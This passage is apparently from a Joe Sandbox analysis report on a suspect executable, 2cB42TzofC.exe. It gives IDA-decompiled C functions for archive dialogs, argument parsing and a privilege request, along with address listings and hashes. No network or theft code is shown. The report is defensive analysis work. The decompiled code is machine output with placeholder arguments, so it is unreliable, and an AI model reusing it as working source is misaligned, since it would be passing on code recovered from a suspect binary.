						_push(0x7c);
						goto L13;
					case 6:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0xca);
						goto L13;
					case 7:
						_push(0x70);
						goto L18;
					case 8:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x72);
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x78);
						goto L13;
					case 0xa:
						_push( *__esi);
						_push(0x85);
						goto L23;
					case 0xb:
						_push( *__esi);
						_push(0x204);
						goto L23;
					case 0xc:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x84);
						goto L13;
					case 0xd:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x83);
						goto L13;
					case 0xe:
						goto L64;
					case 0xf:
						_push( *((intOrPtr*)(__esi + 8)));
						_push( *((intOrPtr*)(__esi + 4)));
						E00A0E0AC(__ecx, 0xd2) = E00A1B118( *__esi, __eax);
						goto L64;
					case 0x10:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0x79);
						goto L13;
					case 0x11:
						_push( *((intOrPtr*)(__esi + 4)));
						_push(0xdc);
						goto L13;
				}
			}












                                                        0x00a11107
                                                        0x00a1110f
                                                        0x00a11115
                                                        0x00a11117
                                                        0x00a1111a
                                                        0x00a1111d
                                                        0x00a11348
                                                        0x00a1134d
                                                        0x00a1134f
                                                        0x00a11354
                                                        0x00a11358
                                                        0x00a11395
                                                        0x00a1135a
                                                        0x00a11374
                                                        0x00a11379
                                                        0x00a113b4
                                                        0x00a113b4
                                                        0x00a113b9
                                                        0x00a113bd
                                                        0x00a113bd
                                                        0x00a11123
                                                        0x00a1133e
                                                        0x00a11267
                                                        0x00a1126c
                                                        0x00a1126d
                                                        0x00a111aa
                                                        0x00a111aa
                                                        0x00a11173
                                                        0x00000000
                                                        0x00a11173
                                                        0x00a11129
                                                        0x00a1112c
                                                        0x00a1122c
                                                        0x00a1122f
                                                        0x00a112ef
                                                        0x00a112ef
                                                        0x00a112f2
                                                        0x00a11334
                                                        0x00000000
                                                        0x00a11334
                                                        0x00a112f4
                                                        0x00a112f4
                                                        0x00a112f7
                                                        0x00a1132d
                                                        0x00000000
                                                        0x00a1132d
                                                        0x00a112f9
                                                        0x00a112f9
                                                        0x00a112fc
                                                        0x00a11320
                                                        0x00a11323
                                                        0x00a1117e
                                                        0x00a11183
                                                        0x00a11184
                                                        0x00a11151
                                                        0x00a11151
                                                        0x00000000
                                                        0x00a11156
                                                        0x00a112fe
                                                        0x00a112fe
                                                        0x00a11301
                                                        0x00a11316
                                                        0x00000000
                                                        0x00a11316
                                                        0x00a11303
                                                        0x00a11303
                                                        0x00a11306
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1130c
                                                        0x00000000
                                                        0x00a1130c
                                                        0x00a11235
                                                        0x00a112e8
                                                        0x00000000
                                                        0x00a112e8
                                                        0x00a1123b
                                                        0x00a1123e
                                                        0x00a11241
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11247
                                                        0x00000000
                                                        0x00a1124e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11258
                                                        0x00a111a2
                                                        0x00a111a7
                                                        0x00a111a8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11262
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11274
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11278
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1127c
                                                        0x00a1127f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11286
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1128d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11294
                                                        0x00a11297
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a112a1
                                                        0x00a112a4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a112b9
                                                        0x00a112c5
                                                        0x00a112ca
                                                        0x00a112cd
                                                        0x00a112d3
                                                        0x00a112db
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11247
                                                        0x00a11132
                                                        0x00a11223
                                                        0x00a11225
                                                        0x00a111c7
                                                        0x00a111c7
                                                        0x00a1114f
                                                        0x00a1114f
                                                        0x00000000
                                                        0x00a1114f
                                                        0x00a1113b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11141
                                                        0x00000000
                                                        0x00a1115e
                                                        0x00a11160
                                                        0x00a11165
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11148
                                                        0x00a1114a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1116c
                                                        0x00a1116e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11179
                                                        0x00a1117c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11188
                                                        0x00a1118b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1118f
                                                        0x00a11192
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11196
                                                        0x00a11199
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111a0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111b2
                                                        0x00a111b5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111b9
                                                        0x00a111bc
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111c0
                                                        0x00a111c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111cf
                                                        0x00a111d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111d8
                                                        0x00a111db
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111e2
                                                        0x00a111e5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a111ec
                                                        0x00a111ef
                                                        0x00a111ff
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1120c
                                                        0x00a1120f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a11216
                                                        0x00a11219
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _swprintf
                                                        • String ID: %ls$%s: %s
                                                        • API String ID: 589789837-2259941744
                                                        • Opcode ID: a0f01bc01b6be4c61177c14cf1e6d30c6d135585553434b15e0db0726cdd663c
                                                        • Instruction ID: 32d41214eaa0c8fdd69f1112fb81da4d0cd56f3b82fdc940243c8221f2c6d39c
                                                        • Opcode Fuzzy Hash: a0f01bc01b6be4c61177c14cf1e6d30c6d135585553434b15e0db0726cdd663c
                                                        • Instruction Fuzzy Hash: DA512C35388708F9F6222FE09E42FF6B6B9AB05B00F24470AF7D6A84D1D5E154D0A717
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2798E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00A2798E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00A2B5A0(_t52);
					GetModuleFileNameA(0, 0xa61130, 0x104);
					_t49 =  *0xa616e0; // 0x32d32f0
					 *0xa616e8 = 0xa61130;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xa61130;
					}
					_v8 = 0;
					_v16 = 0;
					E00A27AB2(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00A27C27(_v8, _v16, 1);
					if(_t64 != 0) {
						E00A27AB2(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00A2B0B3(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xa616d4 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xa616d8 = _t59;
									L16:
									E00A287FE(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xa616d4 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xa616d8 = _t43;
						goto L10;
					} else {
						_t44 = E00A28C7A();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00A287FE(_t64);
						return _t50;
					}
				} else {
					_t45 = E00A28C7A();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00A28B59();
					return _t65;
				}
			}





















                                                        0x00a2798e
                                                        0x00a2799b
                                                        0x00a279bb
                                                        0x00a279ce
                                                        0x00a279d4
                                                        0x00a279da
                                                        0x00a279e2
                                                        0x00a279e9
                                                        0x00a279e9
                                                        0x00a279ee
                                                        0x00a279f5
                                                        0x00a279fc
                                                        0x00a27a0e
                                                        0x00a27a15
                                                        0x00a27a34
                                                        0x00a27a40
                                                        0x00a27a5b
                                                        0x00a27a5e
                                                        0x00a27a65
                                                        0x00a27a6b
                                                        0x00a27a72
                                                        0x00a27a75
                                                        0x00a27a77
                                                        0x00a27a7b
                                                        0x00a27a85
                                                        0x00a27a85
                                                        0x00a27a87
                                                        0x00a27a8d
                                                        0x00a27a90
                                                        0x00a27a92
                                                        0x00a27a98
                                                        0x00a27a99
                                                        0x00a27a9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a27a7d
                                                        0x00a27a7d
                                                        0x00a27a7d
                                                        0x00a27a80
                                                        0x00a27a81
                                                        0x00000000
                                                        0x00a27a7d
                                                        0x00a27a6d
                                                        0x00000000
                                                        0x00a27a6d
                                                        0x00a27a46
                                                        0x00a27a4b
                                                        0x00a27a4d
                                                        0x00a27a4f
                                                        0x00000000
                                                        0x00a27a17
                                                        0x00a27a17
                                                        0x00a27a1c
                                                        0x00a27a1e
                                                        0x00a27a1f
                                                        0x00a27a54
                                                        0x00a27a54
                                                        0x00a27aa2
                                                        0x00a27aa3
                                                        0x00000000
                                                        0x00a27aac
                                                        0x00a279a3
                                                        0x00a279a3
                                                        0x00a279aa
                                                        0x00a279ab
                                                        0x00a279ad
                                                        0x00000000
                                                        0x00a279b2

                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\2cB42TzofC.exe,00000104), ref: 00A279CE
                                                        • _free.LIBCMT ref: 00A27A99
                                                        • _free.LIBCMT ref: 00A27AA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user\Desktop\2cB42TzofC.exe
                                                        • API String ID: 2506810119-3908897534
                                                        • Opcode ID: d07a3cdafd3eb786ed0521b9fddb9492e3a277974116ac93d464d0aac1684cdb
                                                        • Instruction ID: 46915f8242e3cb86272c157e76bb98dbf3ea38a697c2b3f0cbd635da363249ef
                                                        • Opcode Fuzzy Hash: d07a3cdafd3eb786ed0521b9fddb9492e3a277974116ac93d464d0aac1684cdb
                                                        • Instruction Fuzzy Hash: A8316F75A09228EFDB21DF9DED8599EBBFCEB95360B144076F40497211D6B04F418B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A07638 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 63%
                                                        			E00A07638(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E00A1E554(E00A32153, _t61);
				E00A1E630();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00A03AC2( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xa40eb2 == 0) {
						if(E00A07CC4(L"SeSecurityPrivilege") != 0) {
							 *0xa40eb1 = 1;
						}
						E00A07CC4(L"SeRestorePrivilege");
						 *0xa40eb2 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xa40eb1 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xa62000() == 0) {
						if(E00A0B85C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00A06D72(_t70, 0x52, _t54 + 0x24,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E00A07002(_t70);
							if(_t32 == 5 && E00A102FB() == 0) {
								E00A0158D(_t61 - 0x6c, 0x18);
								E00A11107(_t61 - 0x6c);
							}
							E00A06FBA(0xa40f50, 1);
						} else {
							_t39 =  *0xa62000(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E00A015C2(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}












                                                        0x00a07638
                                                        0x00a07638
                                                        0x00a07638
                                                        0x00a0763d
                                                        0x00a07647
                                                        0x00a0764f
                                                        0x00a07652
                                                        0x00a07655
                                                        0x00a07658
                                                        0x00a0765b
                                                        0x00a0765e
                                                        0x00a07663
                                                        0x00a07664
                                                        0x00a07665
                                                        0x00a0766b
                                                        0x00a07673
                                                        0x00a07680
                                                        0x00a0768e
                                                        0x00a07690
                                                        0x00a07690
                                                        0x00a0769c
                                                        0x00a076a1
                                                        0x00a076a1
                                                        0x00a076af
                                                        0x00a076b2
                                                        0x00a076b3
                                                        0x00a076b7
                                                        0x00a076b7
                                                        0x00a076b8
                                                        0x00a076b9
                                                        0x00a076bc
                                                        0x00a076bd
                                                        0x00a076be
                                                        0x00a076c9
                                                        0x00a076e1
                                                        0x00a076f6
                                                        0x00a076ff
                                                        0x00a07704
                                                        0x00a07713
                                                        0x00a0771b
                                                        0x00a0772b
                                                        0x00a07733
                                                        0x00a07733
                                                        0x00a0773c
                                                        0x00a076e3
                                                        0x00a076ec
                                                        0x00a076f2
                                                        0x00a076f4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a076f4
                                                        0x00a076e1
                                                        0x00a07742
                                                        0x00a07746
                                                        0x00a0774f
                                                        0x00a07759

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A0763D
                                                          • Part of subcall function 00A03AC2: __EH_prolog.LIBCMT ref: 00A03AC7
                                                        • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00A07704
                                                          • Part of subcall function 00A07CC4: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A07CD3
                                                          • Part of subcall function 00A07CC4: GetLastError.KERNEL32 ref: 00A07D19
                                                          • Part of subcall function 00A07CC4: CloseHandle.KERNEL32(?), ref: 00A07D28
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                        • API String ID: 3813983858-639343689
                                                        • Opcode ID: 2b78054f34f6328885c49899d78769f2159175c718efb2f257a4172841917d27
                                                        • Instruction ID: 5e7e76ace476cca7a800e127c5a1361be8712bb90e3faa8e3d6eea02be7ca95d
                                                        • Opcode Fuzzy Hash: 2b78054f34f6328885c49899d78769f2159175c718efb2f257a4172841917d27
                                                        • Instruction Fuzzy Hash: 3931E171E0824CAEDF10EFA4ED41BEE7BB8AF45354F004055F94AA71C2C7B15A45CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A6C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E00A1A6C0(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00A0130B(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xa60cb0 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xa60cb0), ( *0xa60cb0)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E00A0BE89(__eflags,  *( *0xa60cb0));
					_t22 = E00A010F0(_t30, E00A0E0AC(_t25, 0x8e),  *( *0xa60cb0), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xa60cb0));
					goto L13;
				}
				goto L6;
			}













                                                        0x00a1a6c1
                                                        0x00a1a6c6
                                                        0x00a1a6cb
                                                        0x00a1a6d0
                                                        0x00a1a6e8
                                                        0x00a1a778
                                                        0x00a1a77a
                                                        0x00000000
                                                        0x00a1a77a
                                                        0x00a1a6ee
                                                        0x00a1a6f4
                                                        0x00a1a767
                                                        0x00a1a769
                                                        0x00a1a76f
                                                        0x00a1a772
                                                        0x00000000
                                                        0x00a1a772
                                                        0x00a1a6f9
                                                        0x00a1a70d
                                                        0x00000000
                                                        0x00a1a70d
                                                        0x00a1a6fe
                                                        0x00a1a701
                                                        0x00a1a75d
                                                        0x00a1a763
                                                        0x00a1a747
                                                        0x00a1a748
                                                        0x00000000
                                                        0x00a1a748
                                                        0x00a1a703
                                                        0x00a1a706
                                                        0x00a1a745
                                                        0x00000000
                                                        0x00a1a745
                                                        0x00a1a70b
                                                        0x00a1a71a
                                                        0x00a1a733
                                                        0x00a1a738
                                                        0x00a1a73a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1a741
                                                        0x00000000
                                                        0x00a1a741
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                                          • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                                        • EndDialog.USER32(?,00000001), ref: 00A1A748
                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A1A75D
                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A1A772
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: ASKNEXTVOL
                                                        • API String ID: 445417207-3402441367
                                                        • Opcode ID: 10d2282509206abab6919e33778f15c754b82d1b5786ff68579ad65ebca7acd7
                                                        • Instruction ID: 387d3351ed684230871a9560e2af3f8d142914288ccd16b770640fcc276e5668
                                                        • Opcode Fuzzy Hash: 10d2282509206abab6919e33778f15c754b82d1b5786ff68579ad65ebca7acd7
                                                        • Instruction Fuzzy Hash: 7611B672245204BFD712DFA4EE49FA777B9EB5A740F140104F381DB1F1C7A19A869B22
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0D483 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A0D483(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00A118AE( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E00A100D6(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E00A0E046();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x32f3098
					_t30 = E00A25BC9(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E00A0D2A0);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xa3e158 +  *_t30 * 0xc; // 0xa346b8
						E00A26230( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}














                                                        0x00a0d483
                                                        0x00a0d483
                                                        0x00a0d483
                                                        0x00a0d484
                                                        0x00a0d488
                                                        0x00a0d48f
                                                        0x00a0d495
                                                        0x00a0d4a5
                                                        0x00a0d4ab
                                                        0x00a0d4af
                                                        0x00a0d4b2
                                                        0x00a0d4bd
                                                        0x00a0d4bd
                                                        0x00a0d4c5
                                                        0x00a0d4c8
                                                        0x00a0d503
                                                        0x00a0d4ca
                                                        0x00a0d4ca
                                                        0x00a0d4cd
                                                        0x00a0d4e2
                                                        0x00a0d4e3
                                                        0x00000000
                                                        0x00a0d4cf
                                                        0x00a0d4d2
                                                        0x00a0d4d7
                                                        0x00a0d4d8
                                                        0x00a0d4e8
                                                        0x00a0d4eb
                                                        0x00a0d4ed
                                                        0x00a0d4ee
                                                        0x00a0d4f3
                                                        0x00a0d4f3
                                                        0x00a0d4d2
                                                        0x00a0d4cd
                                                        0x00a0d50f
                                                        0x00a0d515
                                                        0x00a0d519
                                                        0x00a0d523
                                                        0x00000000
                                                        0x00a0d529
                                                        0x00a0d52f
                                                        0x00a0d538
                                                        0x00a0d540
                                                        0x00a0d540
                                                        0x00a0d497
                                                        0x00a0d497
                                                        0x00a0d497
                                                        0x00a0d497
                                                        0x00a0d547

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: __fprintf_l_strncpy
                                                        • String ID: $%s$@%s
                                                        • API String ID: 1857242416-834177443
                                                        • Opcode ID: 316496fc2de7d590c65c216035cd5cbd86b8a9b16a095f45d84894ca0c713371
                                                        • Instruction ID: 7e1cea74c0b5baa018176c41a39fff46df333db125ea07e47aca3f0012f40554
                                                        • Opcode Fuzzy Hash: 316496fc2de7d590c65c216035cd5cbd86b8a9b16a095f45d84894ca0c713371
                                                        • Instruction Fuzzy Hash: A621517394020CAEEF20DFA4ED45FDE3BA8BF04300F044421FA14961D1E372EA559B61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1AC20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E00A1AC20(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00A0130B(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
